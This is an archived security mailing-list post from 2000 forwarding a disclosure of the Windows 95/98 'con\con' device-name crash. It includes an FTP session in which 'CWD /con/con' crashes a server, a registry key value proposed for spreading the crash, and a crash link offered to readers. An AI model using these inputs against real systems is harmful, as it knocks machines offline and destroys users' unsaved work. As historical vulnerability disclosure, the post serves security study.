con\con is a old thing (anyway is cool)

From: Ussr Labs (labsat_private)
Date: Mon Mar 06 2000 - 09:46:44 PST

Next message: Viktor Fougstedt: "Re: Potential security problem with mtr"

Previous message: Olaf Kirch: "Re: [XFree86 3.3.6] fix for race conditions in xterm logfile"
Next in thread: Stephen White: "Re: con\con is a old thing (anyway is cool)"
Reply: Stephen White: "Re: con\con is a old thing (anyway is cool)"
Reply: Elias Levy: "Re: con\con is a old thing (anyway is cool)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
- ----
New exploit found by the securax crew on 3/3/error

for: windoze 98 maybe 95 too...
not for NT4 or win2K

When we looked at the new exploit for ie that uses the image
c:/con/con
(http://www.zoomnet.net/~quick/error/crash.html)

we experimented a bit with that unexisting path.
We found that any program in windows 98 will crash if you try to open
that file.
eg: try Start --> run --> c:/con/con
or open in Word the non-existing document c:/con/con
both attempts will result in en Blues Screen of death and a lockup.


This can also be exploited to crash remote servers
Look what we tryed on this servU-FTP v 2.4a
(works on any windoze 98 FTP even with anonyous or guest account)

it looked something like this:

230 user logged in, proceed
SYST
215 UNIX TYPE:L8
connect ok!
PWD
257 "c:/home" is current directory.
haal directory op
TYPE A
200 Type set to A.
PORT xx.xx.xx.xx :-)
200 PORT Command succesful
LIST
150 Opening ASCII mode data connect
Download: 86 bytes
Wacht op de server
226 transfer complete
CDUP
250 directory changed to /c:/
PWD
250 "/c:/" is current directory
CWD /con/con				--> this does the trick

...
no more response :-)  server crashed.


This is probably just the beginning of a new series of exploits for
windoze.
this little flaw could easily be used in a macro virus. maybe even be
placed in the registry

HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open
c:\con\con "%1" %*


Da G#Df@RTER & Pathos (securax)

www.securax.org
- ----------------------------------------------------------------------
- ----

this is a really old thing, (good but old), we found it, like 1 year
ago with the
nul/nul, (now are con/con) and we found others but all with the same
error overflow over Explorer.exe and VFat,
windows 95 and windows 98.

to anyone who want to crash the windows 9x click : here
>file://c:\nul\nul<

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c
h
http://www.ussrback.com


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOMPvBNybEYfHhkiVEQKedQCfYYyh2G1TOaE5HdtXo0eNc+/K2lgAoIkt
U+6L5I9uSGENV3KFuyKQ8xqu
=vwMM
-----END PGP SIGNATURE-----

Next message: Viktor Fougstedt: "Re: Potential security problem with mtr"
Previous message: Olaf Kirch: "Re: [XFree86 3.3.6] fix for race conditions in xterm logfile"
Next in thread: Stephen White: "Re: con\con is a old thing (anyway is cool)"
Reply: Stephen White: "Re: con\con is a old thing (anyway is cool)"
Reply: Elias Levy: "Re: con\con is a old thing (anyway is cool)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:39:02 PDT